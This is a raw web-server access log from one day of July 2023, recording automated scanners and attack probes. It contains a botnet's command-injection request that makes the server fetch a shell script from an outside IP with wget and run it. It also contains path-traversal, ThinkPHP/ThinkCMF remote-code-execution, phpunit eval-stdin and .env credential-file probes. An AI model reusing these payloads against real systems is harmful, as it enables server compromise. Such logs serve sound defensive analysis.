141.98.11.207 - - [15/Jul/2023:02:01:37 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" 45.181.40.145 - - [15/Jul/2023:02:23:17 +0200] "GET /triadian/squid.jpg HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Linux; Android 8.0; Pixel 2 Build/OPD3.170816.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.8262.1942 Mobile Safari/537.36" 157.230.84.117 - - [15/Jul/2023:02:39:24 +0200] "GET /geoip/ HTTP/1.1" 404 281 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 157.230.84.117 - - [15/Jul/2023:02:39:24 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Snapchat/10.77.0.54 (like Safari/604.1)" 157.230.84.117 - - [15/Jul/2023:02:39:25 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 157.230.84.117 - - [15/Jul/2023:02:39:25 +0200] "GET /1.php HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 157.230.84.117 - - [15/Jul/2023:02:39:25 +0200] "GET /bundle.js HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 91.224.92.16 - - [15/Jul/2023:02:51:11 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 45.156.129.2 - - [15/Jul/2023:03:37:25 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 45.156.129.2 - - [15/Jul/2023:03:37:26 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 45.156.129.2 - - [15/Jul/2023:03:37:37 +0200] "HEAD /icons/sphere1.png HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 45.156.129.2 - - [15/Jul/2023:03:37:37 +0200] "HEAD /icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png HTTP/1.1" 400 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 45.156.129.2 - - [15/Jul/2023:03:37:37 +0200] "HEAD /icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png HTTP/1.1" 400 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 45.156.129.2 - - [15/Jul/2023:03:37:38 +0200] "HEAD /icons/.%2e/%2e%2e/apache2/icons/sphere1.png HTTP/1.1" 400 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 45.156.129.2 - - [15/Jul/2023:03:37:38 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 45.156.129.2 - - [15/Jul/2023:03:37:38 +0200] "GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1" 404 299 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 45.156.129.2 - - [15/Jul/2023:03:37:50 +0200] "GET /webfig/ HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 45.156.129.2 - - [15/Jul/2023:03:38:00 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 45.156.129.2 - - [15/Jul/2023:03:38:02 +0200] "GET /admin/ HTTP/1.1" 404 281 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 45.156.129.2 - - [15/Jul/2023:03:38:02 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" 45.156.129.2 - - [15/Jul/2023:03:38:02 +0200] "GET /solr/ HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 45.156.129.2 - - [15/Jul/2023:03:38:13 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 45.156.129.2 - - [15/Jul/2023:03:38:24 +0200] "GET /sugar_version.json HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 45.156.129.2 - - [15/Jul/2023:03:38:35 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 198.235.24.233 - - [15/Jul/2023:04:14:14 +0200] "GET / HTTP/1.1" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 104.229.102.63 - - [15/Jul/2023:04:29:41 +0200] "GET /triadian/squid.jpg HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.8504.1703 Mobile Safari/537.36" 20.29.115.150 - - [15/Jul/2023:04:41:38 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://114.67.217.170/sora.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0" 64.62.197.93 - - [15/Jul/2023:05:08:16 +0200] "\x16\x03\x01" 400 383 "-" "-" 177.185.157.3 - - [15/Jul/2023:05:13:28 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 184.105.139.67 - - [15/Jul/2023:05:19:40 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 184.105.139.67 - - [15/Jul/2023:05:21:57 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36" 184.105.139.67 - - [15/Jul/2023:05:22:52 +0200] "GET /geoserver/web/ HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 172.104.210.105 - - [15/Jul/2023:05:23:41 +0200] "-" 408 - "-" "-" 172.104.210.105 - - [15/Jul/2023:05:23:52 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x" 141.98.11.207 - - [15/Jul/2023:05:37:10 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" 162.243.136.15 - - [15/Jul/2023:05:42:32 +0200] "MGLNDD_212.69.160.11_80" 400 383 "-" "-" 213.109.202.66 - - [15/Jul/2023:05:44:21 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 94.102.61.10 - - [15/Jul/2023:05:52:58 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" 185.180.143.6 - - [15/Jul/2023:06:05:59 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 172.104.11.34 - - [15/Jul/2023:06:14:35 +0200] "\x16\x03\x01" 400 383 "-" "-" 213.109.202.66 - - [15/Jul/2023:06:17:58 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 306 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 64.227.0.190 - - [15/Jul/2023:06:52:09 +0200] "GET /client/get_targets HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 64.227.0.190 - - [15/Jul/2023:06:52:09 +0200] "GET /upl.php HTTP/1.1" 404 282 "-" "Mozilla/5.0" 64.227.0.190 - - [15/Jul/2023:06:52:10 +0200] "\x16\x03\x01" 400 383 "-" "-" 64.227.0.190 - - [15/Jul/2023:06:52:10 +0200] "GET /geoip/ HTTP/1.1" 404 281 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 149.18.84.41 - - [15/Jul/2023:06:57:50 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 149.18.84.41 - - [15/Jul/2023:06:57:51 +0200] "POST / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 213.109.202.66 - - [15/Jul/2023:07:07:22 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 306 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 94.102.61.10 - - [15/Jul/2023:07:07:40 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "python-requests/2.26.0" 94.102.61.10 - - [15/Jul/2023:07:07:40 +0200] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.26.0" 94.102.61.10 - - [15/Jul/2023:07:09:11 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "python-requests/2.26.0" 94.102.61.10 - - [15/Jul/2023:07:09:11 +0200] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.26.0" 149.18.84.32 - - [15/Jul/2023:07:18:08 +0200] "GET /~ridersde/joomla/index.php?option=com_xijc&view=captcha HTTP/1.0" 404 309 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0" 141.98.11.207 - - [15/Jul/2023:07:21:32 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" 213.109.202.66 - - [15/Jul/2023:07:37:56 +0200] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 218.145.61.20 - - [15/Jul/2023:07:38:20 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://114.67.217.170/sora.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0" 5.188.87.37 - - [15/Jul/2023:07:56:20 +0200] "GET /wp-login.php HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763" 213.109.202.66 - - [15/Jul/2023:08:06:47 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 194.165.16.37 - - [15/Jul/2023:08:20:24 +0200] "\x03" 400 383 "-" "-" 213.109.202.66 - - [15/Jul/2023:08:39:26 +0200] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 45.79.181.251 - - [15/Jul/2023:09:07:15 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 193.42.32.170 - - [15/Jul/2023:09:35:14 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 193.42.32.170 - - [15/Jul/2023:09:35:14 +0200] "POST / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 213.109.202.66 - - [15/Jul/2023:09:42:23 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 165.232.40.60 - - [15/Jul/2023:09:47:30 +0200] "\x16\x03\x01\x01\xfc\x01" 400 383 "-" "-" 162.142.125.223 - - [15/Jul/2023:10:03:14 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 162.142.125.223 - - [15/Jul/2023:10:03:14 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 162.142.125.223 - - [15/Jul/2023:10:03:14 +0200] "PRI * HTTP/2.0" 400 383 "-" "-" 162.142.125.223 - - [15/Jul/2023:10:03:14 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 162.142.125.223 - - [15/Jul/2023:10:03:15 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 198.235.24.149 - - [15/Jul/2023:10:08:38 +0200] "GET / HTTP/1.1" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 213.109.202.66 - - [15/Jul/2023:10:10:39 +0200] "GET /console/ HTTP/1.1" 404 282 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 205.210.31.134 - - [15/Jul/2023:10:13:03 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 213.109.202.66 - - [15/Jul/2023:11:01:57 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 194.169.175.167 - - [15/Jul/2023:11:18:23 +0200] "GET /alfa-rex.php7 HTTP/1.1" 404 301 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 35.203.211.147 - - [15/Jul/2023:11:40:32 +0200] "GET / HTTP/1.1" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 198.235.24.254 - - [15/Jul/2023:12:16:14 +0200] "GET / HTTP/1.1" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 51.241.168.49 - - [15/Jul/2023:12:22:17 +0200] "GET /triadian/squid.jpg HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.5848.1699 Mobile Safari/537.36" 178.32.197.93 - - [15/Jul/2023:12:25:07 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0" 143.198.85.200 - - [15/Jul/2023:12:39:33 +0200] "GET /files/ HTTP/1.1" 404 281 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 176.121.58.98 - - [15/Jul/2023:12:41:46 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 205.210.31.203 - - [15/Jul/2023:12:51:59 +0200] "GET / HTTP/1.0" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 185.180.143.190 - - [15/Jul/2023:12:52:40 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 185.180.143.190 - - [15/Jul/2023:12:52:41 +0200] "GET /showLogin.cc HTTP/1.1" 404 286 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 222.217.86.135 - - [15/Jul/2023:13:40:53 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://114.67.217.170/sora.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0" 79.137.65.46 - - [15/Jul/2023:13:44:27 +0200] "GET /favicon.ico HTTP/1.1" 404 356 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0" 85.239.33.6 - - [15/Jul/2023:13:56:10 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020" 85.239.33.6 - - [15/Jul/2023:13:59:00 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36" 198.235.24.114 - - [15/Jul/2023:14:04:17 +0200] "\x16\x03\x01" 400 383 "-" "-" 167.248.133.126 - - [15/Jul/2023:14:07:42 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 167.248.133.126 - - [15/Jul/2023:14:07:43 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 167.248.133.126 - - [15/Jul/2023:14:07:43 +0200] "PRI * HTTP/2.0" 400 383 "-" "-" 167.248.133.126 - - [15/Jul/2023:14:07:43 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 167.248.133.126 - - [15/Jul/2023:14:07:43 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 66.240.205.34 - - [15/Jul/2023:14:10:15 +0200] "Gh0st\xad" 400 383 "-" "-" 205.210.31.172 - - [15/Jul/2023:14:15:07 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 185.180.143.138 - - [15/Jul/2023:14:31:53 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 154.16.105.249 - - [15/Jul/2023:14:48:20 +0200] "GET /~ridersde/joomla/index.php?option=com_xijc&view=captcha HTTP/1.0" 404 309 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:70.0) Gecko/20100101 Firefox/70.0" 193.35.18.35 - - [15/Jul/2023:14:50:12 +0200] "GET / HTTP/1.1" 200 274 "-" "Linux Gnu (cow)" 205.210.31.223 - - [15/Jul/2023:15:01:16 +0200] "GET / HTTP/1.1" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 82.25.72.235 - - [15/Jul/2023:15:47:00 +0200] "GET /triadian/squid.jpg HTTP/1.1" 404 295 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.6626.1277 Mobile Safari/537.36" 13.215.242.199 - - [15/Jul/2023:15:47:18 +0200] "GET /robots.txt HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)" 74.133.39.79 - - [15/Jul/2023:15:51:18 +0200] "GET /robots.txt HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Linux; Android 8.0; Pixel 2 Build/OPD3.170816.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.3568.1772 Mobile Safari/537.36" 198.235.24.128 - - [15/Jul/2023:16:10:36 +0200] "GET / HTTP/1.1" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 49.192.115.118 - - [15/Jul/2023:16:13:30 +0200] "GET /triadian/squid.jpg HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.6499.1823 Mobile Safari/537.36" 89.207.131.169 - - [15/Jul/2023:16:14:39 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 OPR/86.0.4363.50" 178.62.22.180 - - [15/Jul/2023:16:22:21 +0200] "GET /client/get_targets HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 109.237.97.180 - - [15/Jul/2023:16:25:26 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 109.237.97.180 - - [15/Jul/2023:16:25:26 +0200] "\x16\x03\x01\x01H\x01" 400 383 "-" "-" 117.199.152.56 - - [15/Jul/2023:16:33:32 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 192.241.236.76 - - [15/Jul/2023:16:56:29 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x" 183.136.225.44 - - [15/Jul/2023:17:16:43 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" 192.241.217.47 - - [15/Jul/2023:17:17:28 +0200] "GET /hudson HTTP/1.1" 404 280 "-" "Mozilla/5.0 zgrab/0.x" 185.38.219.42 - - [15/Jul/2023:17:24:38 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 183.136.225.44 - - [15/Jul/2023:17:28:22 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" 183.136.225.44 - - [15/Jul/2023:17:28:24 +0200] "GET /robots.txt HTTP/1.1" 404 288 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" 213.109.202.66 - - [15/Jul/2023:17:59:39 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 68.183.193.242 - - [15/Jul/2023:18:13:13 +0200] "GET /aaa9 HTTP/1.1" 404 280 "-" "Mozilla/5.0 zgrab/0.x" 68.183.193.242 - - [15/Jul/2023:18:13:37 +0200] "GET /aab8 HTTP/1.1" 404 280 "-" "Mozilla/5.0 zgrab/0.x" 68.183.193.242 - - [15/Jul/2023:18:13:48 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x" 164.92.117.229 - - [15/Jul/2023:19:05:40 +0200] "GET /aaa9 HTTP/1.1" 404 280 "-" "Mozilla/5.0 zgrab/0.x" 164.92.117.229 - - [15/Jul/2023:19:05:56 +0200] "GET /aab8 HTTP/1.1" 404 280 "-" "Mozilla/5.0 zgrab/0.x" 164.92.117.229 - - [15/Jul/2023:19:06:11 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x" 87.236.176.85 - - [15/Jul/2023:19:33:28 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" 87.236.176.195 - - [15/Jul/2023:19:33:35 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" 165.22.60.26 - - [15/Jul/2023:19:41:09 +0200] "GET /aaa9 HTTP/1.1" 404 280 "-" "Mozilla/5.0 zgrab/0.x" 165.22.60.26 - - [15/Jul/2023:19:41:15 +0200] "GET /aab8 HTTP/1.1" 404 280 "-" "Mozilla/5.0 zgrab/0.x" 165.22.60.26 - - [15/Jul/2023:19:41:27 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x" 67.208.52.124 - - [15/Jul/2023:19:53:51 +0200] "GET /triadian/squid.jpg HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.6044.1731 Mobile Safari/537.36" 45.83.65.228 - 